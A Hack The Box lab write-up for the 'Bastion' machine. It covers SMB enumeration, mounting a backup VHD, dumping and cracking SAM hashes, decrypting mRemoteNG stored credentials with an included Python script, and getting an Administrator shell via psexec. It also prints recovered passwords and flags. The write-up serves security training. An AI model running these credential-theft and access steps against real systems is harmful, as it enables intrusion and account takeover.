Bastion
Sun, 29 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.134 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.134
Host is up (0.035s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-09-27T22:44:36+02:00
|_clock-skew: mean: -39m58s, deviation: 1h09m13s, median: -1s
| smb2-time:
| date: 2024-09-27T20:44:32
|_ start_date: 2024-09-27T20:39:59
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.56 seconds
crackmapexec smb 10.10.10.134 -u 'guest' -p '' --shares
SMB 10.10.10.134 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.10.10.134 445 BASTION [+] Bastion\guest:
SMB 10.10.10.134 445 BASTION [+] Enumerated shares
SMB 10.10.10.134 445 BASTION Share Permissions Remark
SMB 10.10.10.134 445 BASTION ----- ----------- ------
SMB 10.10.10.134 445 BASTION ADMIN$ Remote Admin
SMB 10.10.10.134 445 BASTION Backups READ
SMB 10.10.10.134 445 BASTION C$ Default share
SMB 10.10.10.134 445 BASTION IPC$ Remote IPC
impacket-smbclient guest@10.10.10.134
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
Type help for list of commands
# shares
ADMIN$
Backups
C$
IPC$
# use Backups
# tree
/note.txt
/SDT65CB.tmp
/WindowsImageBackup/L4mpje-PC
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
/WindowsImageBackup/L4mpje-PC/Catalog
/WindowsImageBackup/L4mpje-PC/MediaId
/WindowsImageBackup/L4mpje-PC/SPPMetadataCache
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/BackupSpecs.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
/WindowsImageBackup/L4mpje-PC/Catalog/BackupGlobalCatalog
/WindowsImageBackup/L4mpje-PC/Catalog/GlobalCatalog
/WindowsImageBackup/L4mpje-PC/SPPMetadataCache/{cd113385-65ff-4ea2-8ced-5630f6feca8f}
Finished - 23 files and folders
cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
The note is the hint: the VHDs are too large to pull over the link, so the share is mounted and the image is attached in place over CIFS instead.
sudo mount //10.10.10.134/Backups /mnt/smb/
cd /mnt/smb
tree
.
├── JAMXFGROWQ
├── SDT65CB.tmp
├── WindowsImageBackup
│ └── L4mpje-PC
│ ├── Backup 2019-02-22 124351
│ │ ├── 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
│ │ ├── 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
│ │ ├── BackupSpecs.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
│ │ └── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
│ ├── Catalog
│ │ ├── BackupGlobalCatalog
│ │ └── GlobalCatalog
│ ├── MediaId
│ └── SPPMetadataCache
│ └── {cd113385-65ff-4ea2-8ced-5630f6feca8f}
└── note.txt
The nbd kernel module has to be loaded before /dev/nbd0 exists; attaching with -r and mounting with -o ro keeps the backup image read-only so nothing in it is altered while it is inspected.
sudo modprobe nbd max_part=8
sudo qemu-nbd -r --connect /dev/nbd0 \
/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
sudo mount -o ro /dev/nbd0p1 /mnt/vhd
cd /mnt/vhd
ls
'$Recycle.Bin' PerfLogs ProgramData 'System Volume Information' Windows config.sys
'Documents and Settings' 'Program Files' Recovery Users autoexec.bat pagefile.sys
grep -rw 'SAM' Windows
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Loading offline registry hive: SAM, into registry key '{bf1a281b-ad7b-4476-ac95-f47682990ce7}E:/Windows/System32/config/SAM' from path '\\?\E:\Windows\System32\config\SAM'.
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Unloading offline registry hive: {bf1a281b-ad7b-4476-ac95-f47682990ce7}E:/Windows/System32/config/SAM
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Failed to unload offline registry: {bf1a281b-ad7b-4476-ac95-f47682990ce7}E:/Windows/System32/config/SAM, the client may still need it open. [HRESULT = 0x80070005 - E_ACCESSDENIED]
grep -rw 'SYSTEM' Windows
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Loading offline registry hive: SYSTEM, into registry key '{bf1a281b-ad7b-4476-ac95-f47682990ce7}E:/Windows/System32/config/SYSTEM' from path '\\?\E:\Windows\System32\config\SYSTEM'.
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Unloading offline registry hive: {bf1a281b-ad7b-4476-ac95-f47682990ce7}E:/Windows/System32/config/SYSTEM
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Failed to unload offline registry: {bf1a281b-ad7b-4476-ac95-f47682990ce7}E:/Windows/System32/config/SYSTEM, the client may still need it open. [HRESULT = 0x80070005 - E_ACCESSDENIED]
impacket-secretsdump LOCAL -sam Windows/System32/config/SAM -system Windows/System32/config/SYSTEM
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
echo 'Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::' > hashes
john hashes -w=rockyou --format='NT'
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2024-09-28 00:44) 5.405g/s 25392Kp/s 25392Kc/s 25406KC/s burgerd..burdoux
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
Only the L4mpje hash was worth cracking: 31d6cfe0d16ae931b73c59d7e0c089c0, shared by Administrator and Guest, is the NT hash of the empty string, which is why john prints a blank password for (Administrator).
l4mpje:bureaulampje
ssh l4mpje@10.10.10.134
l4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users>tree /F
Folder PATH listing
Volume serial number is 00000055 1B7D:E692
C:.
├───Administrator
├───L4mpje
│ ├───Contacts
│ ├───Desktop
│ │ user.txt
│ │
│ ├───Documents
│ ├───Downloads
│ ├───Favorites
│ │ │ Bing.url
│ │ │
│ │ └───Links
│ ├───Links
│ │ Desktop.lnk
│ │ Downloads.lnk
│ │
│ ├───Music
│ ├───Pictures
│ ├───Saved Games
│ ├───Searches
│ └───Videos
└───Public
├───Documents
├───Downloads
├───Music
├───Pictures
└───Videos
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
c349597e3f979e6ecb25ab6795e2fe0b
l4mpje@BASTION C:\Users>tree %appdata% /f
Folder PATH listing
Volume serial number is 1B7D-E692
C:\USERS\L4MPJE\APPDATA\ROAMING
├───Adobe
│ └───Flash Player
│ └───NativeCache
└───mRemoteNG
│ confCons.xml
│ confCons.xml.20190222-1402277353.backup
│ confCons.xml.20190222-1402339071.backup
│ confCons.xml.20190222-1402379227.backup
│ confCons.xml.20190222-1403070644.backup
│ confCons.xml.20190222-1403100488.backup
│ confCons.xml.20190222-1403220026.backup
│ confCons.xml.20190222-1403261268.backup
│ confCons.xml.20190222-1403272831.backup
│ confCons.xml.20190222-1403433299.backup
│ confCons.xml.20190222-1403486580.backup
│ extApps.xml
│ mRemoteNG.log
│ pnlLayout.xml
│
└───Themes
darcula.vstheme
vs2015blue.vstheme
vs2015dark.vstheme
vs2015light.vstheme
findstr /si "passw" *
confCons.xml: <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" ...
aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
Administrator:thXLHM96BeKL0ER2
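The decrypt call above is given only the ciphertext, so it must be relying on mRemoteNG's built-in master password. As an added example (neither the page's decrypt script nor mRemoteNG's own code), the following reimplements the scheme and walks a whole confCons.xml: each Password attribute is base64, laid out as a 16-byte salt, a 16-byte nonce, the ciphertext and a 16-byte GCM tag; the key is PBKDF2-HMAC-SHA1 over the master password and salt (KdfIterations from the file, 1000 by default) with the salt doubling as GCM associated data. The default master password is assumed to be "mR3m"; the sample file is constructed, with the Node attributes taken from the findstr hit above and the root element's attributes assumed. AES-GCM comes from the cryptography library, falling back to pycryptodome.

```python
"""Decrypt mRemoteNG confCons.xml credentials (added example, not the page's script)."""
import base64
import hashlib
import xml.etree.ElementTree as ET

# Use whichever AES-GCM implementation is installed; neither is in the stdlib.
try:
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def _aes_gcm_open(key, nonce, ciphertext, tag, aad):
        return AESGCM(key).decrypt(nonce, ciphertext + tag, aad)
except ImportError:
    try:
        from Cryptodome.Cipher import AES
    except ImportError:
        from Crypto.Cipher import AES

    def _aes_gcm_open(key, nonce, ciphertext, tag, aad):
        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
        cipher.update(aad)
        return cipher.decrypt_and_verify(ciphertext, tag)

DEFAULT_MASTER_PASSWORD = "mR3m"  # assumed mRemoteNG default when the user never set one


def decrypt_mremoteng(blob_b64: str, master_password: str = DEFAULT_MASTER_PASSWORD,
                      iterations: int = 1000) -> str:
    """Decrypt one Password="..." value from confCons.xml (AES-256-GCM format).

    Blob layout: [16-byte salt][16-byte nonce][ciphertext][16-byte GCM tag].
    Key: PBKDF2-HMAC-SHA1(master_password, salt, iterations, 32 bytes).
    The salt is also the GCM associated data, so it is integrity-protected too.
    """
    blob = base64.b64decode(blob_b64)
    if len(blob) < 48:
        raise ValueError("blob too short to hold salt, nonce and tag")
    salt, nonce = blob[:16], blob[16:32]
    ciphertext, tag = blob[32:-16], blob[-16:]
    key = hashlib.pbkdf2_hmac("sha1", master_password.encode("utf-8"), salt,
                              iterations, dklen=32)
    # A wrong master password or a tampered blob fails the GCM tag check and raises.
    return _aes_gcm_open(key, nonce, ciphertext, tag, salt).decode("utf-8")


def extract_connections(confcons_xml: str,
                        master_password: str = DEFAULT_MASTER_PASSWORD) -> list:
    """Return (name, hostname, protocol, username, password) for every connection node.

    password is None when decryption fails (wrong master password, unknown format).
    """
    root = ET.fromstring(confcons_xml)
    iterations = int(root.get("KdfIterations", "1000"))
    rows = []
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        enc = node.get("Password", "")
        try:
            pw = decrypt_mremoteng(enc, master_password, iterations) if enc else ""
        except Exception:
            pw = None
        rows.append((node.get("Name"), node.get("Hostname"), node.get("Protocol"),
                     node.get("Username"), pw))
    return rows


# Constructed sample. The <Node> attributes are the ones recovered on Bastion above;
# the root element and its attributes are assumed for the demo.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General"
      Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain=""
      Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
      Hostname="127.0.0.1" Protocol="RDP" />
</mrng:Connections>
"""

if __name__ == "__main__":
    for name, host, proto, user, pw in extract_connections(SAMPLE_CONFCONS):
        print(f"{name}: {proto}://{user}@{host} password={pw!r}")
```

If the user had set their own master password, every row would come back as None; that is the signal to try the password already in hand (here bureaulampje) as the master password before anything else, since reuse between the Windows logon and the mRemoteNG vault is common.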
impacket-psexec 'Administrator'@10.10.10.134 cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on 10.10.10.134.....
[*] Found writable share ADMIN$
[*] Uploading file wjtrUkFl.exe
[*] Opening SVCManager on 10.10.10.134.....
[*] Creating service GMyk on 10.10.10.134.....
[*] Starting service GMyk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type c:\users\administrator\desktop\root.txt
58f0e7962cab06b509f7421f76d87060